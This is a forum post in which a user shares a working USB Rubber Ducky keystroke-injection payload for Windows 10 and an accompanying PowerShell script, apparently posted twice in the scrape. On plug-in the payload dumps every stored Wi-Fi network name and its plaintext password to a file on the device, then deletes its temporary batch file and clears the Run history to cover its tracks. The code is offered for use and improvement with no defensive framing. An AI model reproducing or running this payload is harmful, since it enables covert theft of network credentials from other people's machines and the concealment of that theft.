Beg stole and borrowed from other peoples code and amended to get to what I wanted, most of the code is form Darren Kitchen's 15 second password hack for bits around how to use Twin Ducky and how to keep use and save files whilst mounting the Ducky as a USB storage device... It's not perfect but hits the mark for what I currently need. To summarise:
* It creates a .BAT file in %TEMP% which finds the assigned drive of the DUCKY
* It then uses Select-Stringcmdlet to get the password for the wireless networks on the target machine
* Saves this (albeit slightly messily) to Output.txt on the Ducky
* Finally gets rid of the TEMP file and history in the run command window
Look forward to comments and anything anyone can suggest to speed this up and make it better.
Cheers
Audie
Ducky Script
REM Author: Audie2180
REM Ducky WIFI credential plain text password report: 1.0
REM Target: Windows 10
REM Firmware: Twin Duck 2.1
REM Description: Runs Powershell to get wifi password using ConvertFrom-String, saves to notepad, saves to Ducky, Clears up tracks
DELAY 1000
REM ----Open cmd as administrator
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM ----Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM ----Make batch file that waits for SD card to mount.
REM ----Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (
ENTER
STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (
ENTER
STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )
ENTER
STRING )
ENTER
STRING )
ENTER
STRING if Exist %DuckyDrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM ----Continue script
STRING Powershell %DuckyDrive%\a.ps1 > %DuckyDrive%\Output.txt
ENTER
CONTROL z
ENTER
REM --- Close CMD
DELAY 500
ALT F4
DELAY 500
REM ---- Run BAT file
DELAY 1000
GUI r
DELAY 500
STRING %TEMP%/DuckyWait.bat
DELAY 500
ENTER
DELAY 800
REM ----Open cmd as administrator
GUI R
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM --- Clean up, close CMD, delete tmp files, remove command prompt hist
REM --- Cleanup file created
DELAY 500
STRING del /f %TEMP%\DuckyWait.bat
ENTER
REM ----Clear the Run history and exit
DELAY 500
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
REM --- Close CMD
DELAY 500
ALT F4
DELAY 500
REM ---- Flash CAPSLOCK
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
... which obviously needs to be compiled as an inject.bin, but also needs the following Powershell file...
a.ps1
#Make a list with all WiFi SSID's and passwords stored locally on Windows OS.
$output = netsh.exe wlan show profiles
$profileRows = $output | Select-String -Pattern 'All User Profile'
$profileNames = New-Object System.Collections.ArrayList
#for each profile name get the SSID and password
for($i = 0; $i -lt $profileRows.Count; $i++){
$profileName = ($profileRows[$i] -split ":")[-1].Trim()
$profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear
$SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name'
$profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"'
$passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content'
if($passwordSearchResult){
$profilePw = ($passwordSearchResult -split ":")[-1].Trim()
} else {
$profilePw = ''
}
$networkObject = New-Object -TypeName psobject -Property @{
ProfileName = $profileName
SSID = $profileSSID
Password = $profilePw
}
$profileNames.Add($networkObject)
}
$profileNames | Sort-Object ProfileName | Select-Object ProfileName, SSID, Password
Get Wifi passwords from Windows 10 - Twin Ducky 2.1
in Classic USB Rubber Ducky
Posted
My first script using the Ducky...
Beg stole and borrowed from other peoples code and amended to get to what I wanted, most of the code is form Darren Kitchen's 15 second password hack for bits around how to use Twin Ducky and how to keep use and save files whilst mounting the Ducky as a USB storage device... It's not perfect but hits the mark for what I currently need. To summarise:
* It creates a .BAT file in %TEMP% which finds the assigned drive of the DUCKY
* It then uses Select-String cmdlet to get the password for the wireless networks on the target machine
* Saves this (albeit slightly messily) to Output.txt on the Ducky
* Finally gets rid of the TEMP file and history in the run command window
Look forward to comments and anything anyone can suggest to speed this up and make it better.
Cheers
Audie
Ducky Script
REM Author: Audie2180 REM Ducky WIFI credential plain text password report: 1.0 REM Target: Windows 10 REM Firmware: Twin Duck 2.1 REM Description: Runs Powershell to get wifi password using ConvertFrom-String, saves to notepad, saves to Ducky, Clears up tracks DELAY 1000 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM ----Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM ----Make batch file that waits for SD card to mount. REM ----Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM ----Continue script STRING Powershell %DuckyDrive%\a.ps1 > %DuckyDrive%\Output.txt ENTER CONTROL z ENTER REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Run BAT file DELAY 1000 GUI r DELAY 500 STRING %TEMP%/DuckyWait.bat DELAY 500 ENTER DELAY 800 REM ----Open cmd as administrator GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM --- Clean up, close CMD, delete tmp files, remove command prompt hist REM --- Cleanup file created DELAY 500 STRING del /f %TEMP%\DuckyWait.bat ENTER REM ----Clear the Run history and exit DELAY 500 STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit REM --- Close CMD DELAY 500 ALT F4 DELAY 500 REM ---- Flash CAPSLOCK CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK DELAY 500 CAPSLOCK
... which obviously needs to be compiled as an inject.bin, but also needs the following Powershell file...
a.ps1
#Make a list with all WiFi SSID's and passwords stored locally on Windows OS. $output = netsh.exe wlan show profiles $profileRows = $output | Select-String -Pattern 'All User Profile' $profileNames = New-Object System.Collections.ArrayList #for each profile name get the SSID and password for($i = 0; $i -lt $profileRows.Count; $i++){ $profileName = ($profileRows[$i] -split ":")[-1].Trim() $profileOutput = netsh.exe wlan show profiles name="$profileName" key=clear $SSIDSearchResult = $profileOutput| Select-String -Pattern 'SSID Name' $profileSSID = ($SSIDSearchResult -split ":")[-1].Trim() -replace '"' $passwordSearchResult = $profileOutput| Select-String -Pattern 'Key Content' if($passwordSearchResult){ $profilePw = ($passwordSearchResult -split ":")[-1].Trim() } else { $profilePw = '' } $networkObject = New-Object -TypeName psobject -Property @{ ProfileName = $profileName SSID = $profileSSID Password = $profilePw } $profileNames.Add($networkObject) } $profileNames | Sort-Object ProfileName | Select-Object ProfileName, SSID, Password